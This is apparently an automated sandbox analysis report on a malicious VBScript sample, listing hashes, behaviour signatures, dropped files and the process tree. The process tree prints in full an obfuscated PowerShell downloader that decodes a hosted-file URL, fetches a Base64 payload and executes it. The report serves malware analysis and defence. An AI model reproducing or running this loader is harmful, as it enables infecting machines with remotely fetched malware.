Analysis

  • max time kernel: 94s
  • max time network: 95s
  • platform: windows10-2004_x64
  • resource: win10v2004-20240426-en
  • resource tags: arch:x64, arch:x86, image:win10v2004-20240426-en, locale:en-us, os:windows10-2004-x64, system
  • submitted: 08/06/2024, 07:18

General

  • Target: 83d3658eae751eca0688750d43d8c07889b437eca461ba5a41b552048d3ad75d.vbs
  • Size: 23KB
  • MD5: 70e2991e57991e054e3473a4a9ec2a63
  • SHA1: 1fe4276566a2c6e7db0ab8b85cdc7b4de9cf86c1
  • SHA256: 83d3658eae751eca0688750d43d8c07889b437eca461ba5a41b552048d3ad75d
  • SHA512: 4f32f979ca9da2bcca42d727f08215f8b652b17d0e98d9e31fe6f5414789731bf9805d8f74990af917ea8c2b0b4f0fa9124101759df17d4c601d90670f76300d
  • SSDEEP: 384:AcYk2uAnvIa7Yp000ekqThmLjp45PyUi6KkNXmNYXkfRf:Acx2p57qQqejpAPyUi6BNXxUft

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request (3 IoCs)
  • Checks computer location settings (2 TTPs, 1 IoC)

    Looks up country code configured in the registry, likely geofence.

  • Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
  • Enumerates physical storage devices (1 TTP)

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses (2 IoCs)
  • Suspicious use of AdjustPrivilegeToken (1 IoC)
  • Suspicious use of WriteProcessMemory (4 IoCs)

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\83d3658eae751eca0688750d43d8c07889b437eca461ba5a41b552048d3ad75d.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2528
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Lgknoldet = 1;Function Berringsfladen190($Scratchcard){$Coil=$Scratchcard.Length-$Lgknoldet;$Kodfoderets='Substring';For( $gadebilledet=7;$gadebilledet -lt $Coil;$gadebilledet+=8){$Underargue+=$Scratchcard.$Kodfoderets.Invoke( $gadebilledet, $Lgknoldet);}$Underargue;}function Forlyder($Climata11){ & ($Spatten) ($Climata11);}$benzimidazole=Berringsfladen190 'At,osfrMOsteopeoWheelabzIconveriAnnicaslSquiffilUndisciaSyninge/ Militr5Autobah.R.educa0Nonrege Untast.(ArbejdsWKonsti i UnderlnapiolindThermogoSvensknwPhototusKelpi,g TwofersNNudni.kTEntreat aianis1 Ari.rs0Aminotr. Heglin0Ostraci;Reguler FenolerWBestredi OpremsnBredspe6Kandi,a4Ba depl;Salater TilflyxDirecto6Profite4Hyperfo; Curumi Cam,hacrbrndborvPluri.o:Smit et1Uvaerd 2Undergr1Omlbets.Snitvrk0Phenoge)rgsjler KonsumpG bi.dsee EthanocIlluderk Embo,co Re.ren/Sarcorh2B,edsaa0 Lemmed1Osmousa0Karskca0Teknolo1.nitsel0Fagvide1Enbran, DelthedFtro,ekliM,crospr.iggyslechalanafLeukemio UdpegexM ckere/Klockma1Justtre2l,njefa1Renerne.Unmecha0Sa mens ';$Tirve=Berringsfladen190 'ImpoverUTandlgesMyelineeslickinrReempha- AngepiA BerusegOpinioneEksisten infinitEskimol ';$hawklike=Berringsfladen190 'PaneulohPrinzhot lar.ertDaavildp Si.onisSam.and:Pict.an/Lystopf/outw.rkdFastholrBrut.oiiGestikuvPhocenie Deir r.Huchof,gdissei,oUnbarspo.icondygHalvkuglKlvedese Firepl.Afnati.c IntranoPruditym,pasmol/T.letaduruf sitcSvmmela?Discrete ArchpaxClinoc pTr adreoPatri.trStemmeptF rulem=Asplenidneighboo,dscripw pill anGallardlatomythotautoloaProx,mod Beeroc&D,llerii ChoribdForbrnd=Ostraco1FyrmestRStaminaRSplurgigReprovip Echino_Centr,fRBrnelrdz Rvrdig2Enceph,yClothotpSuitlikiOculonaJforbrydcStreget0Kyphosi0 ,radusN Pi,udipOceanisuFuturisZ T,ille4goo nesPChaperot gyrome-MateriaiAabenbaw Stnned9WellermvMinimumjDeserteKSektion2 Nonmet7Ganglio2grundta ';$Galliwasp=Berringsfladen190 ' Cumbro>Noncura ';$Spatten=Berringsfladen190 'cylindeiAntisipespionsax Lkkers 
';$Cestos='Plsebar';$Uncastle = Berringsfladen190 'Skrukh.eVarebetc BoremahResorbeoRebuoya Dobbel%GuldaldaRebunchpUnglac pInstrumd Dent,iaNonsenst Slavd,a .akers% Uncarn\rovsingkKassea r Phyl.oe DammusdT larigiUnraptutCurvulatDonkeyke F somhnInterd,.LeatherN estlndoFunnellnudstykn Tanksta&indenri&populat Sk,vrigeFixearbcUnaturehDespotioRedisti SiegeabtHyleton ';Forlyder (Berringsfladen190 'Minxshi$kazaktagperspe l Yi,esao ellw nbMentoriaMaintailweather:GetatabBGrat,iteFalsknekAl,rinslSt,diecaResign gSluknineForeloulJoniseriJant.rsg HandedeFolkedor Ringvee comedis Angleb=Lsepult(Codesigc Forligm asturtdW.ndfla Coilyea/Wal,mancMilieur unmole$AndensiUOverfornStn,etsc GratisaForv klsArteriotDiphtholSeriocoeVampyr )Imm nas ');Forlyder (Berringsfladen190 'Ekst.at$t,kstmag BalloolTahinamoVan,alibAlgeaspaSusendel Bortad:,iatomeBgaspistuFun.ametValfar.y OutgoilMilitrnaEl.ktrimLiljekoi,ignalbnForbruseDisprop=gy,ospo$VelopdrhefterkraSeksogtwDirekt.kYaqo,aslKradsemiOrd einkSeptleveAscidio.Maaltids UnriskpCoveraglHusstaniEnergimtV,dired(Vlverhu$SprngkrGclo steaArno.islMurmurelGalosheiE fektiwSyskedaa SentimsBancosrpWeelvir)Hemolym ');$hawklike=$Butylamine[0];$Icterine= (Berringsfladen190 'Lysesta$ Unp,esgMisapprlLygtem,oCliquisb ParqueaSuppegrlWooersv:F.rbldtBti,guytrStreli nPallidieSpo,tedsReturneaUndisseaLiv,lanrBortled=Lich opN Celeb,eKalve,rw E,char-Pa,asubOHoverenbHerbagej.ilburseNonpondc U urdet Regara CeilingSCalibrayBreechlsLutianitMancheseCertifimOvulist.Homoc.nNS ldiereO.cultitRa,atou.D.ppelkWHeltindeOutpoisbTruistiCPa,tsuil R,bbiniDyr.naveAk,iespnSelektit');$Icterine+=$Beklageligeres[1];Forlyder ($Icterine);Forlyder (Berringsfladen190 ' Sundhe$ Besku BKampk,ar DopplenPoncedneSjlelivs Khahooa,orestia RigborrUnf.rio.WortworH Fritage MonograDemiss.dkonsumeeHelbredr deconcsDru.maa[Rodkno.$TeleskoTSpk.uggi Unn tirArtillevCoronateCurs,re] Rea,ti=Reperso$AsketerbMiljpaaeBeboelsnbamboozzHal.geniyerkednmPsammopiIndividd commena Lemlstz.ackeysoKildeskl ynenefe Opslmm 
');$Vicontiels=Berringsfladen190 ' Cult v$PaginerB Eve,tyrUr,nomenAfgangseRibningsMu icataBesgactaCognat rGenicul.PorphyrDBilandeoargumenwMac.otonEfterralTollek osmlehovaOvervind OversiFTv vlraiTeledenlLeikafoeBitterb(titulad$Data.ash NuleneaEscandawKphjestkLeukstrl Daughti Ug.kork arbuckeRegnska,Galgenf$ AfdampP Uhllost ashpeeeRiddamprAepost oseismomsBrandfapIndsk.ieLedelinr Ejend.mTrffedeo aestrouGalmandswurleyp)Unfavou ';$Pterospermous=$Beklageligeres[0];Forlyder (Berringsfladen190 ' Flyv,r$Plu,aligKompenslA elopro ThreepbGa.tritaKontoralBlommes: Heli.pOOpskrtekOneirosknotkerieFrihederGaneftrn,arkanteAttaindsSpkhugg1Velaryd9Spisefr8Skybru =Amatrni(AnretteTPlisseee MglingsWeirdybtTheoris-kemikalPDeplaneaWackymutSsonerchSrtilfl Noshers$DagtjenPTvivllstAlcaic,eElessarrhaandhvoUdsk.ftsAfstivepUnderekeOpinionrUanseelmcalycoioDelfiunu NidifisVirksom)Pal,ada ');while (!$Okkernes198) {Forlyder (Berringsfladen190 'Roseola$T.lkebigBkke,belOpslideoFa vetabH lverea Trfsikl Becree: rigsrVTakkeklvExtillveTweedjar oliedriStk.ingsFidd eb=Slutdis$PrognostimmoralrFaint su Dis,oneAnissma ') ;Forlyder $Vicontiels;Forlyder (Berringsfladen190 ' Chond.SRet eadtAmm.nitaNondemarMaa,edstSteekin-MarmoreSnetstrmlR,jsebeeTelephoeUnpeacepStr,gsr Bryllup4fire,ar ');Forlyder (Berringsfladen190 'Fo.efal$SporinggMouthp lDdedansoNoexfrdb oughesa nstabil Dephlo: FormueO.panagekEpiz,oakHeweunpe agustircapitulnNonferoeVindikas Karrie1 cciput9Aa.esky8elletre=Adulter(Afsy inTRevivale Ciconis otaltetBumleno-DemagniPPleurocaCorriget.aandudhFrstesa ,linkfy$BrneforPBecommatPlatteneHungerlrSalgssto BortsasFoliernpSindelae ContemrPreheatmZollsuboDicho,duKod ficsproblem)Mink.ar ') ;Forlyder (Berringsfladen190 'Oliefar$Konc rngAnaly.el GlyoxyoRaf.inebDisq,isaZoransbl Arguit:KulturmPOrthoceuVerden,sWigletstEdsformeCaloricrKolonneuDe.elecm FortepmVemo.sse,nlagemnCha,emoe Dimiss=Phellog$NotochogSocketll,ndespooVammelhbBrakvanaByggemylStoette:Kolokv.eEjendomxNonulcecPebbleha undervvRaakremaCrookintSre 
ebaeDeskr,ps Unfatt+Avenuer+Steffis% Sku.ri$Joypop.BChokolauM.tvasktPriorizyLigaturlMagnascaEarscremStratociFrimeninS.hverteTwe vem.WanglincTruttacoweaseleu.udipednSe,vanttKa.eand ') ;$hawklike=$Butylamine[$Pusterummene];}$unentrapped=293328;$Zooplasty177=30076;Forlyder (Berringsfladen190 'Espe,an$ SelskagSt.gsejlTacheomoSemiquibActuariarecrushl fisker:RelishiAKompromgSemostogCircumfrG,noesee Ensilag,yppelsaB holdntMultisoeKejserptUdkaarisEt.onom Mor,inb=Outbrag TindingGGlycopeeLvs.ovetassurer-EineborC Mol,bdoOptrkkenunl.beltPyrenoieGrskepen Gyrinit F lker Uncolor$ Gluep PFo.dumstEgalitee EmissirScaremoodesertes UnderdpbeadroleComputeropercu mFugtigkoSjllanduColyticsPa idae ');Forlyder (Berringsfladen190 'Enaptse$CurranagPonyerslSlutbetoShoddywbCapsuliaNervulolGospel.: Bur.auR Dysleke O alizlHomotraeSaltiesgGymnasieAshramsrEidologi TuparanFotocelg Sorthae E.odfirScutchen Keelmae RenummsAngrebs Roekamp= Syg.jo Ahoycri[SuperesSUdtagetyLanier,sResprintAirbruseNavle,em Spor.e.Propo,tCEnamou oKonkurrnNeo.acivGladsakeSv,dekurUskoksntproinve]Refinis:Trowser:TaenkteFSerb rarEk pedeoNonellimMiswaytBSa menbaEntredesUnintereSaunder6Aminosy4 ReeshiSCarcinotdukkevorDiptycaiZind.senHelautogStrenge(Grovvar$ MethodAkassablgJackersg EventurShockineAnimistgTrini raBehov.ntPrereveeSlagt,ft LollypsBillige) Predic ');Forlyder (Berringsfladen190 ' Pa til$Dy frosgDesorbel RechaloFortrngbL idensaslavehal,astril:MutismpPSamhrigr ReciviaAfholdei holines C relleBeedigerInd,ere Forhold=Superw pehohom[.earlssSDeci.esybsseninsDiscerpt ybstegeModstanmE.ratum.RestrikT InexoreH,lgenex Sc,phatSpouseh. 
sningeEBnd llanLejdesacO,erridoFamlesfdDicingoi Thiochn GigologDunamsd] Sp,nta:Stor.ed:KorrigaAFa veglSMill onCRkkeflgI ,ricotIFl essa.ChromomG .ipskgeSorglstt PseudoSBal.egntDmning.rThistediGi.bettnKonsummgrekapit(Trumfst$HudsoniRToys,meeCheesemlRetorsie TransmgKunstmaeBlegso rMetazoai DublednAdvocatgPudderne KnackerFlerdobnWiener,eNiaisgusNo,syll) Bitsto ');Forlyder (Berringsfladen190 'Searcha$Teori.ngrattrailMavercao Unmustb StorfaaSonicatl Decolo: LancerACa,pfirsIltningk Stabile ImpenetSlalomeeUnoilgrn.apperl=un rook$DansetrPFlabederstabelvaRodeoeni ,rydefsretfrd eTaranchrDrif.sp.TopkicksAdhib.tuBe,ryprbGenindssAffronttPiperylrSort.meiindissonLagringgApathi,(No.comp$ThessaluMonostenVeerufyeLaasesmnBescurft Loathsr,uldbryaOperaerpdiskenspVenialieBocher.dTatt dd,Stillin$ReappliZGevreruoslutt dodefencepuretms.l.onsellaMenufilsCataclytTote.ply.erolig1Spidsmu7Mrkelig7Bouillo)Que.ule ');Forlyder $Asketen;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4808
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\kreditten.Non && echo t"
        3⤵
          PID:4776

    Network

          MITRE ATT&CK Enterprise v15

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\Flyulykker.txt
            Filesize: 8KB
            MD5: b98730add3fdac807aa8a524679c31c7
            SHA1: 0027f4bf52d43ea2aaee06a78c4dca190799e5f9
            SHA256: 8a6d3e18638460134e0ca1020b5d2ed00246327d28516b7181423e6a16ebeeed
            SHA512: 546bc8b8b3dd9d6f5a870794ad38b30ff0e052be9d00b3e5d6e35a8ca417970b86456e39d1bc6a5fb652b4d9b5765d3b47fc43033a0a151db9791df64b0b92d3

          • C:\Users\Admin\AppData\Local\Temp\Flyulykker.txt
            Filesize: 494B
            MD5: 290fae52f17dbaeec503dfb5d085abff
            SHA1: fdae242a21f6383d0d5aab98f1bf1f3768d833b6
            SHA256: d2390d6c0c3ba3ae1422d582888dcadcb05c387567e3000eb148da64aeb364e9
            SHA512: 7f6d352a85b7fb6c5f5d5d2d76bd081a525ff941b28f481d166a054dbbdcbe0aa4640ea6eb31b226d59f94a4cd5a549df9f041880e481ff397294a048a7a280b

          • C:\Users\Admin\AppData\Local\Temp\Flyulykker.txt
            Filesize: 3KB
            MD5: e3c54d10d7b28f4437e5082454a22cb7
            SHA1: f5d6c9ff3d8bebf64c7a03416e005aea2f72f82e
            SHA256: 4641feef049099ee8406644631ffb5a83d07c631c29f15490824d649c52c868b
            SHA512: f26f744f344c692551d23f0d8281f27bd2bd6de2263b89c1642f3196ac90c28337019e5d47e9b88cf2e607b5a3e70f3c30f9ee94fb9fae43b4f3a351cd309fc6

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_z3j3x4tj.eds.ps1
            Filesize: 60B
            MD5: d17fe0a3f47be24a6453e9ef58c94641
            SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
            SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
            SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • memory/4808-311-0x00007FFBFE473000-0x00007FFBFE475000-memory.dmp
            Filesize: 8KB

          • memory/4808-313-0x0000026BB38B0000-0x0000026BB38D2000-memory.dmp
            Filesize: 136KB

          • memory/4808-322-0x00007FFBFE470000-0x00007FFBFEF31000-memory.dmp
            Filesize: 10.8MB

          • memory/4808-323-0x00007FFBFE470000-0x00007FFBFEF31000-memory.dmp
            Filesize: 10.8MB

          • memory/4808-326-0x00007FFBFE470000-0x00007FFBFEF31000-memory.dmp
            Filesize: 10.8MB

          • memory/4808-329-0x00007FFBFE470000-0x00007FFBFEF31000-memory.dmp
            Filesize: 10.8MB

          • memory/4808-330-0x00007FFBFE470000-0x00007FFBFEF31000-memory.dmp
            Filesize: 10.8MB